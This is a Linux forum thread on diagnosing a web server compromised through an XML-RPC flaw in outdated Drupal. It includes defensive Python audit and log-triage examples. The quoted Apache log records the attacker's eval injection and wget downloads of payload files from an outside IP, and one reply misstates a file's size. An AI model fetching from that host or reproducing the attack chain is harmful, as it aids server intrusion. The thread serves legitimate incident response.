LinuxQuestions.org
Old 12-22-2005, 08:39 AM   #16
Capt_Caveman
Quote:
Capt_Caveman, yes, I totally agree with you. In fact I'm concerned, but rebuilding the entire system is not an option right now.
Right now I haven't seen anything that says you need to. However, if the cracker was able to get root access, then that is the only effective option.

Quote:
I would like to know how they compromised my /tmp folder too, but I've limited expertise.
There can be several places on many Linux installs that are by default writable to the Apache user, /tmp being one of them. Depending on how your system was configured, the server root can be as well. Again though, this is a symptom; files are often placed by crackers in /tmp because it's writable to the apache user. The real question is how they were able to get access to the apache user and upload files onto the system. Locking down /tmp is a good start in hardening the system, but it doesn't address that issue. Also be careful about how you go about it, as /tmp needs to be writable to a wide number of system utils.
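Added example (not from the thread or either poster): a Python audit of the two things this post raises, which directories the Apache account can create files in, and whether /tmp is a separate mount carrying noexec/nosuid/nodev. The account name `apache`, the fallback uid/gid 48 and the list of paths scanned are assumptions; the `Entry` records and mount lines used to exercise it are constructed.

```python
"""Audit where a service account (here: the Apache user) can write, and whether
/tmp is mounted with hardening options. Added example, not code from the thread.
The account name, fallback ids and scanned paths are assumptions."""
import os
import pwd
import grp
import stat
from dataclasses import dataclass


@dataclass(frozen=True)
class Entry:
    path: str
    mode: int   # full st_mode: file type, sticky/setuid bits and permissions
    uid: int
    gid: int


def can_write(entry: Entry, uid: int, gids: frozenset) -> bool:
    """Plain POSIX write check: owner bits if uid matches, else group bits if
    any of the user's groups match, else 'other' bits. Ignores ACLs, SELinux
    and root, so it is a lower bound on what the account can do."""
    m = entry.mode
    if entry.uid == uid:
        return bool(m & stat.S_IWUSR)
    if entry.gid in gids:
        return bool(m & stat.S_IWGRP)
    return bool(m & stat.S_IWOTH)


def writable_dirs(entries, uid, gids):
    """(path, sticky) for every directory the account can create files in.
    The sticky bit on a world-writable dir like /tmp only stops users from
    deleting or renaming each other's files; dropping new files still works."""
    return [(e.path, bool(e.mode & stat.S_ISVTX))
            for e in entries
            if stat.S_ISDIR(e.mode) and can_write(e, uid, gids)]


HARDENING_OPTS = ("noexec", "nosuid", "nodev")


def missing_tmp_options(mounts_text, mountpoint="/tmp"):
    """Parse /proc/mounts-style text. Returns the hardening options missing on
    the mountpoint, or None when it is not a separate mount at all (mount
    options cannot be applied to a plain directory on the root filesystem)."""
    for line in mounts_text.splitlines():
        fields = line.split()
        if len(fields) >= 4 and fields[1] == mountpoint:
            opts = set(fields[3].split(","))
            return [o for o in HARDENING_OPTS if o not in opts]
    return None


def scan(paths):
    """Build Entry records from the live filesystem, skipping missing paths."""
    entries = []
    for p in paths:
        try:
            st = os.lstat(p)
        except OSError:
            continue
        entries.append(Entry(p, st.st_mode, st.st_uid, st.st_gid))
    return entries


def user_ids(name):
    """uid plus primary and supplementary gids of a local account."""
    pw = pwd.getpwnam(name)
    gids = {pw.pw_gid} | {g.gr_gid for g in grp.getgrall() if name in g.gr_mem}
    return pw.pw_uid, frozenset(gids)


if __name__ == "__main__":
    try:
        uid, gids = user_ids("apache")          # Fedora's httpd account (assumed)
    except KeyError:
        uid, gids = 48, frozenset({48})         # Fedora's default apache ids (assumed)
    live = scan(["/tmp", "/var/tmp", "/dev/shm", "/var/www/html", "/var/www/cgi-bin"])
    for path, sticky in writable_dirs(live, uid, gids):
        print(f"apache can write to {path}" + (" (sticky)" if sticky else ""))
    if os.path.exists("/proc/mounts"):
        with open("/proc/mounts") as f:
            print("/tmp missing options:", missing_tmp_options(f.read()))
```

`noexec` on /tmp stops a dropped binary from being executed directly but not `sh /tmp/x` or `perl /tmp/x`, and it only applies when /tmp is its own filesystem (the check returns None otherwise). Either way it changes where files can land, not how the attacker reached the apache user, which is the point of the post above.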
 
Old 12-24-2005, 01:52 AM   #17
woranl
After googling the web, I've found something called modsecurity for Apache; it's a web application firewall.

I installed and configured it, and it looks like the problem occurred because I didn't update my Drupal.

Here is one of the entries in my log file from modsecurity:

Quote:
==09758743==============================
Request: www.mydomain.com ##.##.###.### - - [23/Dec/2005:22:56:56 --0500] "POST /xmlrpc.php HTTP/1.1" 412 323 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1" H@188cCoAGUAAD1eAxsAAAAJ "-"
Handler: php5-script
----------------------------------------
POST /xmlrpc.php HTTP/1.1
Host: ##.##.###.###
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1
Content-Type: text/xml
Content-Length: 269
mod_security-message: Access denied with code 412. Pattern match "<(.|\\n)+>" at POST_PAYLOAD
mod_security-action: 412

269

HTTP/1.1 412 Precondition Failed
Content-Length: 323
Content-Type: text/html; charset=iso-8859-1
--09758743--
Is this an HTML/JavaScript injection attack? (whatever that is)

Also, after carefully looking at my Apache error log, here is the part where things went wrong:

Quote:
[Tue Dec 20 08:48:43 2005] [error] [client 216.138.244.145] script not found or unable to stat: /var/www/cgi-bin/awstats
[client 216.138.244.145] script '/var/www/html/xmlrpc.php' not found or unable to stat
[client 216.138.244.145] PHP Warning: Unterminated comment starting line 1 in /var/www/html/blog/includes/xmlrpcs.inc(249) : eval()'d code on line 1
--08:48:47-- http://209.136.48.69/mirela
=> `mirela'
Connecting to 209.136.48.69:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 94 [text/plain]

0K 100% 3.90 MB/s

08:48:47 (3.90 MB/s) - `mirela' saved [94/94]

--08:48:47-- http://209.136.48.69/d
=> `d'
Connecting to 209.136.48.69:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 469,240 (458K) [text/plain]

0K ...[Tue Dec 20 08:48:48 2005] [error] [client 216.138.244.145] File does not exist: /var/www/html/blog/xmlsrv
....... ...[Tue Dec 20 08:48:49 2005] [error] [client 216.138.244.145] File does not exist: /var/www/html/blogs
....... ..[Tue Dec 20 08:48:50 2005] [error] [client 216.138.244.145] File does not exist: /var/www/html/drupal
.......[Tue Dec 20 08:48:52 2005] [error] [client 216.138.244.145] File does not exist: /var/www/html/phpgroupware
. ......[Tue Dec 20 08:48:53 2005] [error] [client 216.138.244.145] File does not exist: /var/www/html/wordpress
..[client 216.138.244.145] script '/var/www/html/xmlrpc.php' not found or unable to stat
.. .......... 10% 6.81 KB/s
50K ...[Tue Dec 20 08:48:55 2005] [error] [client 216.138.244.145] File does not exist: /var/www/html/xmlrpc
.......[Tue Dec 20 08:48:56 2005] [error] [client 216.138.244.145] File does not exist: /var/www/html/xmlsrv
.......... .......... .......... .......... 21% 6.95 KB/s
100K .......... .......... .......... .......... .......... 32% 6.94 KB/s
150K .......... .......... .......... .......... .......... 43% 7.11 KB/s
200K .......... .......... .......... .......... .......... 54% 7.17 KB/s
250K .......... .......... .......... .......... .......... 65% 7.60 KB/s
300K .......... .......... .......... .......... .......... 76% 8.67 KB/s
350K .......... .......... .......... .......... .......... 87% 14.05 KB/s
400K .......... .......... .......... .......... .......... 98% 13.90 KB/s
450K ........ 100% 19.13 KB/s

08:49:43 (8.23 KB/s) - `d' saved [469240/469240]

--08:49:43-- http://209.136.48.69/w
=> `w'
Connecting to 209.136.48.69:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 34,913 (34K) [text/plain]

0K .......... .......... .......... .... 100% 16.89 KB/s

08:49:45 (16.89 KB/s) - `w' saved [34913/34913]
Now I've got modsecurity installed.
Block the attacker's IP (although they can always use another IP to attack me again).
Hm, what else should I do next?
BTW, thanks for all your replies.
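Added example (not the poster's code): a small Python triage of the Apache error log quoted above. It pulls out the probing client, the `eval()'d code` warning from `xmlrpcs.inc` (the code-execution indicator) and the wget transcript, whose progress output is interleaved with later error entries because the download was run by the httpd process itself. `SAMPLE_LOG` is constructed from the lines quoted in the post; the regexes and the verdict rule are the example's own.

```python
"""Triage an Apache error log showing the pattern from the thread: path
probing, a PHP warning from eval()'d code in xmlrpcs.inc, then a wget
transcript interleaved with later error entries. Added example; SAMPLE_LOG is
constructed from the lines quoted in the post."""
import re
from collections import Counter, defaultdict

SAMPLE_LOG = """\
[Tue Dec 20 08:48:43 2005] [error] [client 216.138.244.145] script not found or unable to stat: /var/www/cgi-bin/awstats
[client 216.138.244.145] script '/var/www/html/xmlrpc.php' not found or unable to stat
[client 216.138.244.145] PHP Warning: Unterminated comment starting line 1 in /var/www/html/blog/includes/xmlrpcs.inc(249) : eval()'d code on line 1
--08:48:47-- http://209.136.48.69/mirela
=> `mirela'
Length: 94 [text/plain]
08:48:47 (3.90 MB/s) - `mirela' saved [94/94]
--08:48:47-- http://209.136.48.69/d
=> `d'
Length: 469,240 (458K) [text/plain]
0K ...[Tue Dec 20 08:48:48 2005] [error] [client 216.138.244.145] File does not exist: /var/www/html/blog/xmlsrv
....... ..[Tue Dec 20 08:48:50 2005] [error] [client 216.138.244.145] File does not exist: /var/www/html/drupal
. ......[Tue Dec 20 08:48:53 2005] [error] [client 216.138.244.145] File does not exist: /var/www/html/wordpress
..[client 216.138.244.145] script '/var/www/html/xmlrpc.php' not found or unable to stat
08:49:43 (8.23 KB/s) - `d' saved [469240/469240]
--08:49:43-- http://209.136.48.69/w
=> `w'
08:49:45 (16.89 KB/s) - `w' saved [34913/34913]
"""

CLIENT_RE = re.compile(r"\[client (\d{1,3}(?:\.\d{1,3}){3})\] (.*)")
PROBE_RES = [
    re.compile(r"File does not exist: (\S+)"),
    re.compile(r"script '([^']+)' not found or unable to stat"),
    re.compile(r"script not found or unable to stat: (\S+)"),
]
# PHP reports the file whose eval() ran the injected code as "<file>(<line>) : eval()'d code"
EVAL_RE = re.compile(r"in (\S+)\(\d+\) : eval\(\)'d code")
WGET_URL_RE = re.compile(r"^--\d\d:\d\d:\d\d--\s+(https?://([^/\s]+)/\S*)", re.M)
WGET_SAVED_RE = re.compile(r"`([^']+)' saved \[(\d+)/\d+\]")


def triage(text):
    """Summarise client activity, probed paths, eval() hits and downloads."""
    clients = Counter()
    probes = defaultdict(list)
    eval_hits = []
    for line in text.splitlines():
        # search(), not match(): wget progress dots can precede an error entry
        m = CLIENT_RE.search(line)
        if not m:
            continue
        ip, msg = m.group(1), m.group(2)
        clients[ip] += 1
        for pr in PROBE_RES:
            pm = pr.search(msg)
            if pm:
                probes[ip].append(pm.group(1))
                break
        em = EVAL_RE.search(msg)
        if em:
            eval_hits.append((ip, em.group(1)))
    saved = {name: int(size) for name, size in WGET_SAVED_RE.findall(text)}
    downloads = []
    for url, host in WGET_URL_RE.findall(text):
        name = url.rsplit("/", 1)[-1]   # wget saves under the last path component
        downloads.append({"url": url, "host": host, "file": name, "bytes": saved.get(name)})
    return {"clients": clients, "probes": dict(probes),
            "eval_hits": eval_hits, "downloads": downloads}


def is_compromised(summary):
    """Scanning noise alone is not a compromise; eval()'d code reached from a
    web request followed by payload downloads is."""
    return bool(summary["eval_hits"]) and bool(summary["downloads"])


if __name__ == "__main__":
    s = triage(SAMPLE_LOG)
    print("clients:", dict(s["clients"]))
    print("eval hits:", s["eval_hits"])
    for d in s["downloads"]:
        print(f"downloaded {d['file']} ({d['bytes']} bytes) from {d['host']}")
    print("compromised:", is_compromised(s))
```

The probe list is what a web scanner leaves on every server and on its own only justifies a block; the `eval()'d code` line tied to `xmlrpcs.inc` plus files fetched from one host is what turns this into an incident, and the three saved names and sizes are the artifacts to pull from the box for analysis.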
 
Old 12-26-2005, 05:13 PM   #18
Capt_Caveman
Looks like your system is vulnerable to the XML-RPC vulnerability. This is a fairly old bug and Fedora has issued a fix for it. Have you kept your system updated with security fixes/patches? If not, then that is definitely a problem that you need to address immediately.
 
Old 12-26-2005, 05:18 PM   #19
woranl
When I type yum update in a terminal, it said my system is up to date.
Am I missing something?
 
Old 12-26-2005, 05:31 PM   #20
Capt_Caveman
Have you updated since the attack appeared in your logs (Dec 20)?

Also, a little OT, but I would highly recommend running some form of antivirus on the system as well. Cracking binaries are notorious for being infected with Linux viruses, plus the scan itself resembles that of the lupper/luppi worm and one of the uploaded binaries is approximately the same size (34Mb).